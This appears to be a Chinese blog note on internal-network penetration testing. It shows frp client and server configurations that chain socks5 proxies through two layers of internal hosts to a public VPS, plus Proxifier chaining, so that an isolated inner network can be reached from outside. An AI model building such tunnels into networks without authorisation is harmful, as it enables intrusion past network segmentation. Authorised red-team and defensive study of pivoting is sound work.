使用场景
适用于内网渗透时存在多层内网的情况,可以将二层不出网的内网代理到外层内网,再通过端口转发方式代理到公网,实现将二层内网转发到公网的目的。
关键词
两次转发,代理链
具体配置
二层内网主机(45.xx.xx.178)
//frpc.ini
[common]
server_addr = 45.xx.xx.122 //一层内网主机地址
server_port = 11001 //一层内网主机监听端口
token = 1q2w3e
protocol = tcp
[socks5]
type=tcp
remote_port = 12001
plugin = socks5
一层内网主机(45.xx.xx.122)
//frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 11001
token = 1q2w3e
protocol = tcp
//frpc.ini
[common]
server_addr = 81.xx.xx.108 //公网VPS地址
server_port = 11002 //公网VPS监听端口
token = 1q2w3e
protocol = tcp
[socks5]
type=tcp
remote_port = 12002
plugin = socks5
公网主机(81.xx.xx.108)
//frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 11002
token = 1q2w3e
protocol = tcp
Proxifier配置
按下图所示配置代理链:
规则中使用代理链进行代理:
测试结果
代理连接成功:
当前IP为二层主机IP:
总结
在遇到多层内网的情况下,借助双层代理能够很好地进行目标核心内网的渗透,获取更多成果,是内网渗透中非常实用的技巧。
评论区